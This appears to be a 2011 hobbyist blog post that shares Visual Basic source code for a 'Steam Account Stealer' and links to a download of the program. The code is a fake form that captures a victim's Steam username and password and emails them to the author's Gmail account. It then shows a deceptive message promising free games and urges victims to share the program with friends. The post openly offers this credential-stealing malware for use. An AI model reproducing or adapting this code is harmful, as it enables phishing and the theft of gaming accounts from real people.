Wednesday, March 30, 2011

Simple Steam Acc Stealer

This is a very simple...well not even tutorial, this is a very simple Steam Account Stealer I made in Visual Basic 2010. This is my 3rd day for using Visual Basic so cut me some slack :P I know this is probably a really bad method and no one will fall for it but hey, its worth a try :P

Program Screenshot:

[Image: hzmb9.png]

How it works is very simple, they enter the info in the box and press submit and it sends the info that they typed in the box to your email.

Source Code:
Code:
Imports System.Web
Imports System.IO
Imports System.Net.Mail
Public Class Form1
    Private Sub Button1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button1.Click
        Dim mail As New MailMessage
        Dim SmtpServer As New SmtpClient
        SmtpServer.Credentials = New Net.NetworkCredential("YOUR EMAIL", "YOUR EMAIL PASSWORD")
        SmtpServer.Port = 587
        SmtpServer.Host = "smtp.gmail.com"
        SmtpServer.EnableSsl = True
        mail.To.Add("YOUR EMAIL")
        mail.From = New MailAddress("YOUR EMAIL")
        mail.Subject = "Steam Account Information"
        mail.Body = "Username: " & TextBox1.Text & "          Password: " & TextBox2.Text
        SmtpServer.Send(mail)
        MsgBox("Thank you for using our beta software. Please give us sometime to complete your transaction. Depending on how busy our server is your request may take 1 day to 1 week. Please share with your friends if you want more games to be added!")

    End Sub

    Private Sub Label11_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Label11.Click
        Me.Close()
    End Sub
End Class


Virus Scan:

http://www.virustotal.com/file-scan/repo...1299731565

2/43.

I promise this is not going ot harm you in anywhere, i'm new to hacking but i'm sure 2 AVs detect it as a virus because it steals informations.

You can download the source code and they program in a .rar file here:

http://www.mediafire.com/?amd9ouhrmn1z7k5

0 Comments:

Post a Comment